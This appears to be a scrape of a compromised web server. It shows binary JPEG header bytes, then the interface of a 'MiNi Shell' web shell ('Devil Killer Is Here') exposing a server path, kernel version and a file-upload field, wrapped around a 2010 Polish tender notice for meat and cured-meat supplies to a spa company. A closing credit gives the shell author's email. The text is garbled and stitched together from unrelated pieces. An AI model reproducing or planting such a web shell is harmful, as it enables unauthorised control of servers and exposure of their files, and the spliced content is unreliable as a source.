JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/385596-N-2010.html

<p class="kh_header"><b>Jelenia Góra: Dostawa mięsa i wedlin</b><br>
<b>Numer ogłoszenia: 385596 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Cieplice Sp. z o.o. , ul. P. Ściegiennego 5/7, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 075 7551003 do 05, faks 075 7552557.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-cieplie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i wedlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy mięsa i wędlin drobiowych i wieprzowo - wołowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość zamówienia uzupełniającego, stanowiącego nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.33.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wy,magane</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagana</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">koncesje</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-cieplice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Cieplice Spółka z o.o. 
adres: Jelenia Góra, ul. Piotra Ściegiennego 5/7
pokój 108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2010 godzina 10:00, miejsce: Uzdrowisko Cieplice Spółka z o.o. 
adres: Jelenia Góra, ul. Piotra Ściegiennego 5/7
pokój - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I
                       Mięso i przetwory  wołowe i wieprzowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.


Wołowina b/k extra
15111000-9
PN-88/A-82003
Mięso świeże - nie mrożone, element wołowy pozbawiony kości, wyselekcjonowane części udźca, bez ścięgien i tkanki tłuszczowej,

kg

370
2
Flaki wołowe blanszowane
15114000-0
PN-86/A-82004
Flaki wołowe krojone blanszowane w opakowaniach
 900 g 
 

op

320
3
Antrykot  extra
Mięso świeże - nie mrożone, element wołowy z kością, 

kg

1400



Mięso wieprzowe

4.

Schab b/k 
15113300-6
PN-86-A-8200
Mięso świeże - nie mrożone, element wieprzowy pozbawiony kości, zawiera najdłuższy mięsień grzbietu pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna 


kg

180
5
Schab z koscią
Mięso świeże - nie mrożone, element wieprzowy z kością, zawiera najdłuższy mięsień grzbietu 


15113300-6
 pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna 
    kg
1600
PN-86-A-8200



6
Karkówka  b/k
15113300-6
PN-86-A-82002
Mięso świeże - nie mrożone, element wieprzowy, pozbawiony kości w kształcie nieforemnego walca; znajduje się w przedniej części półtuszy, dopuszczalna tkanka mięśniowa przerośnięta tłuszczem


kg

830
7
Szynka b/k
15113300-6
PN-A-82007
Mięso świeże - nie mrożone, element wieprzowy pozbawiony kości znajdujący się w tylnej części półtuszy, składający się z kilku części anatomicznych mięśni - jest prawie całkowicie pozbawiony tkanki tłuszczowej


kg

165
8
Łopatka b/k
15113300-6
PN-86-A-82002
Mięso świeże - nie mrożone, element wieprzowy, pozbawiony kości, znajduje się w przedniej części półtuszy, dopuszczalna tkanka mięśniowa przerośnięta tłuszczem


kg
1790
9
Łopatka z/k
15113300-6
PN-86-A-82002
Mięso świeże - nie mrożone, element wieprzowy, z  kością, znajduje się w przedniej części półtuszy, bez skóry

kg

150

10
Żeberka wieprzowe
15113000-6
PN-88/A-82002
Żeberka świeże paski- nie mrożone , element  wieprzowy ,tkanka mięśniowa lekko przerośnięta tłuszczem


kg


370
Przetwory mięsne

11.
Boczek wędzony
15131220-3
PN-A-82007
Boczek wędzony - świeży, dolna cz. tłuszczowo-mięsna, oddzielona od góry - po linii cięcia płata słoninowego, od tyłu - po linii odcięcia pachwiny


kg

210

12.
Szynka wieprzowa
chlebowa
15131220-3
PN-A-82007:1996
Produkt świeży -skład 90% mięso wieprzowe z szynki ,przyprawy .Wędzony .

kg

350
13
Szynka wiejska
15131220-3
PN-A-82035:2005

Produkt świeży z szynki wieprzowej 72,4 % , wędzony .

kg

250
14
Szynka z wędzarni

15131220-3
PN-A-82007:1996
Produkt świeży z szynki wieprzowej .wędzonka z okrywą tłuszczową .Pakowana w atmosferze ochronnej .

kg

120
15
Szynka dębowa
15131220-3
PN-A-82007:1996
Produkt świeży z szynki wieprzowej , wędzony, 

kg

220
16
Szynka wiśniowa
15131220-3
PN-A-82007
Produkt świeży z szynki wieprzowej /63%/ ,wyrób wędzony

kg

160
17
Szynka chłopska
15131220-3
PN-A-82007
Produkt świeży z szynki wieprzowej b/k, świeży,  wędzony, 

kg

105
18
Szynka biała
15131220-3
PN-A-82007
Produkt świeży z szynki wieprzowej , parzonej. 

kg

85
19
Ogonówka
15131220-3
PN-A-82007
Produkt świeży -skład : mięso wieprzowe 80,6%.
Wyrób wędzony , parzony .

kg

30
20
Polędwica sopocka
15131220-3
PN-A-82007:1997
Produkt świeży o składzie : schab b/k 91% ,sól,izolat białka sojowego , skrobia ziemniaczana ,cukry , przyprawy ,stabilizatory , przeciwutleniacz , konserwant .

kg

470
Kiełbasy drobno rozdrobnione

21.
Parówkowa
wieprzowa
15130000-8
PrPN-V-74028
Produkt świeży z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, rozdrobniony do masy homogennej w osłonce -Skład: mięso wieprzowe 82% , woda , sól , białko zwierzęce , konserwant ,przyprawy naturalne.

kg


130

22.
Parówka cielęca wiedeńska

15130000-8
PrPN-V-74028
Produkt świeży z mięsa cielęcego rozdrobniony do masy homogennej w osłonce naturalnej

kg

110
Kiełbasy średnio rozdrobnione

23
Śląska 
15131130-5
PN-A-82025
Produkt świeży z mięsa wieprzowego rozdrobnionego w osłonkach
naturalnych, wędzona i parzona

kg
 
890

24.
Krakowska sucha     
15131130-5
PN-A-82007:1996
Produkt świeży -skład : 90% mięso wieprzowe , sól ,przyprawy , konserwant , ,przeciwutleniacz ,
Kiełbasa grubo rozdrabniana ,podsuszana.

kg

20

25.
Szynkowa wieprzowa 
15131130-5
PN-A-82028
Produkt świeży z mięsa wieprzowego w osłonkach, produkt parzony i wędzony

kg
 
600

26
Jarmarczna              
15131130-5
PN-A-82028
Produkt świeży z mięsa wołowego i wieprzowego w osłonkach naturalnych wieprzowych, wędzona i parzona 

kg

520
27
Salceson wiejski       
15131130-5
PN-A-82028
Produkt z podrobów wieprzowych w osłonkach naturalnych, 

kg

355

28

Podwawelska
15131130-5
PN-A-82028
Produkt świeży z mięsa wieprzowego rozdrobnionego w osłonkach, poddany parzeniu

kg

120
29
 Szynka sudecka
15131130-5
15131130-5
Produkt świeży z mięsa wieprzowego w osłonkach, produkt parzony i wędzony

kg

350
30
Swojska
15131130-5
PN-A-82007
Produkt z mięsa wieprzowego w osłonkach naturalnych, parzony, wędzony i suszony,średnio rozdrobniona.
kg
50
31
Kiełbasa biała           
15131133-6
PN-A-82007
Produkt z mięsa wieprzowego i wołowego w osłonkach naturalnych wieprzowych , parzony 



kg


530
Przetwory podrobowe
32
Pasztetowa wieprzowa
15131310-1
PN-A-82007
Produkt świeży powstały z podrobów i surowców mięsnych wieprzowych rozdrobnionych do masy homogennej w osłonkach sztucznych , produkt parzony.



kg

200
33
Kaszanka jęczmienna
15131134-3
Kaszanka jęczmienna z podrobami w naturalnej osłonce

kg

760
34
Ozorki wieprzowe
15131134-3
PN-A-82007
Produkt swieży, I gatunek

kg

270
35
Smalec wieprzowy w kostkach
15131134-3
PN-A-82007
Wyrób świeży w kostkach 250 g
szt
2000
36
Słonina świeża
15412100-0
PN-85/A85800
słonina świeża 

kg

240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.32.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II
	Mięso i przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Udko drobiowe
15112000-6
PN-A-86524
Świeży - nie mrożony element kurczaka zawierający pałkę i podudzie (bez kręgosłupa) 

kg
Filet z piersi kurczaka
15112000-6
PN-A-86524
Świeży - nie mrożony element drobiowy pozbawiony kości, mięsień piersiowy tuszki

kg
Filet z indyka
15112000-6
PN-A-86524
Świeży - nie mrożony element indyczy pozbawiony kości, mięsień piersiowy tuszki

kg
Kurczak świeży
15112000-6
PN-86524
Świeży - nie mrożony kurczak 

kg
Porcje rosołowe 
15112120
PN-A-86524
świeże nie mrożone 

kg
Podroby drobiowe
6
Kiełbasa drobiowa parówkowa
1513500-0
PN-A-86523
Produkt świeży głównie z mięsa drobiowego rozdrobniony do homogennej masy w osłonkach naturalnych, produkt wędzony i parzony

kg

150
7
Polędwica drobiowa
bostońska
1513500-0
PN-A-86526/A 1:1998
Skład surowcowy : filet indyczy , izolat białka sojowego , sól , cukry ,przyprawy , woda , stabilizatory , konserwant ,przeciwutleniacz , wzmacniacz smaku , w osłonkach sztucznych 

kg

120
8
Wątróbka drobiowa
1513500-0
PN-A-86523
Element świeży podrobowy z kurczaka

kg

320
9
Szynka Gerwazego
15131135
PN-A-86526/A
Wyrób średnio rozdrobniony parzony.
Mięso indycze 32% 

kg

55
10
Rolada drobiowa
1513500-0
PN-A-86526/A1:1998
Mięso drobiowe, średnioro zdrobnione, produkt parzony w sztucznej osłonce

kg

35
11
Schab drobiowy z ziołami
1513500-0
PN-A-86523
mięso drobiowe średnio rozdrobnione w osłonkach sztucznych z przyprawami , produkt parzony

kg

20
12
Żywiecka drobiowa
1513500-0
PN-A-86523
Produkt świeży z mięsa drobiowego rozdrobnionego w osłonkach- produkt wędzony i parzony

kg

25
13
Kiełbasa biała parzona

1513500-0
PN-A-86526:1995
Kiełbasa średnio-rozdrobniona extra I gatunek w naturalnej osłonce, mieso drobiowe 

kg

490
14
Parówki drobiowe 
15131135
PN-A-86526:1995
Produkt świeży z mięsa drobiowego, rozdrobniony do masy homogennej w osłonce naturalnej

kg

700
15
Polędwica Miodowa
151131135
PN-A-86526:1995
o składzie : mięso z indyka 48,8 % ,woda , skrobia ziemniaczana , skorki wieprzowe, sól ,białko sojowe, zagęstnik , stabilizator, przyprawy naturalne i ich ekstrakty , przeciwutleniacz , substancje wzmacniające smak ,aromaty , miód, substancje konserwujące  

kg

55
16
Pierś królewiecka
15131135
ZN-BB-11/01/2006
Wyrób parzony ; Filet z indyka 50,5% 

kg

25

17
Polędwica sławska
151131135
PN-A-86526:1995
mięso drobiowe średnio rozdrobnione w osłonkach sztucznych , produkt parzony

kg

15

18
Pasztet pieczony
15131310-1

Mięso drobiowe i podroby, rozdrobniony, I gatunek
kg
65
19
Pasztet z drobiu
15131310-1
Konserwa 160 g
szt
2100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.33.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com